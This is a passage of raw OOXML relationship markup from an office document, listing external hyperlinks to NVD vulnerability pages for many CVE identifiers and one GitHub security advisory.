Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68929" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73251" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77413" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77414" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77415" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77644" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77776" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85391" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87929" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88069" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63382" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63385" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67276" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67402" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77645" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82090" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87930" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-51679" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16272" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22590" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41869" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49849" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52766" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53939" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55247" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55248" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55536" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55640" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57499" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58400" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62862" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73253" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73256" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73257" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75340" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77337" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80164" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86419" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87806" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67403" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68484" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75604" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87613" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87911" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30864" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79921" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-56798" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14359" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19633" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21094" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31936" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33240" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41870" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48050" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49050" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53527" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53528" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53706" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54721" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55485" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55509" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55541" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55585" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55637" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57866" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62316" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69857" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71808" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75161" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75166" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75169" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75339" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76801" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79423" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80099" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80130" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80914" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80921" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82089" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86099" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86404" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86482" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86775" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87430" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87433" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87440" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87444" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87460" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87489" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87536" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87542" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87569" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87570" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87579" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87585" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87587" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87588" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87612" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87617" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87625" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87636" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87766" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87795" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87823" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87927" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54355" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54390" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54393" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58381" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58382" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14297" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40877" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47665" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53530" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53758" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53924" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55245" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55763" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55764" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57445" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62865" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63383" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63384" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63403" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77120" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77298" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77354" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77357" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79756" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79989" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81640" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84304" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86199" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86201" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86428" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86435" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87807" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87808" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87816" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87817" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87822" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87995" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-rg7q-4223-phjw" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14962" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19233" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26212" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34741" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47727" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49310" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50553" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52776" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54511" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55182" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55534" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55539" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55557" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55580" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55848" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63219" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77775" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79322" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80214" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8044" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81889" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84068" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86762" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 